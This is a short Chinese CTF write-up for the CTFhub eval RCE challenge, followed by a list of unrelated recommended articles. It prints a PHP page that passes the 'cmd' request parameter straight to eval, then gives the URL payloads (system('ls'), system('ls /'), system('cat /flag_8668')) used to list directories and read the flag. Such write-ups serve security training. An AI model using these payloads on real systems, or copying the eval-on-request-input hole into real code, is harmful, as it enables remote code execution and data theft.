CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
斌味代码5 分钟前
SpringBoot 3 实战:虚拟线程、全局异常处理与 JWT 鉴权完整方案
java·spring boot·后端
锦木烁光18 分钟前
多端项目太乱?我是这样用 Monorepo 重构的
前端·架构
电商API&Tina22 分钟前
跨境电商如何接入1688官方寻源通接口?附接入流程
java·数据库·python·sql·oracle·json·php
上山打牛22 分钟前
cornerstone3D基本使用
前端
阿鑫_99623 分钟前
通用-Nvm基础知识
前端
银河系的一束光26 分钟前
旅游网站html、css、bootstrap
css·html·旅游
Mr_Xuhhh26 分钟前
深入理解Java Map与Set:从二叉搜索树到哈希表,全面解析搜索数据结构
java·数据结构·散列表
xinzheng新政29 分钟前
Javascript·深入学习基础知识
前端·javascript·学习
于先生吖34 分钟前
支持二开与商用,JAVA 漫剧付费观看系统完整源码
java·开发语言
曹牧36 分钟前
Java: 从oracle表中获取一组kv序列
java·开发语言·oracle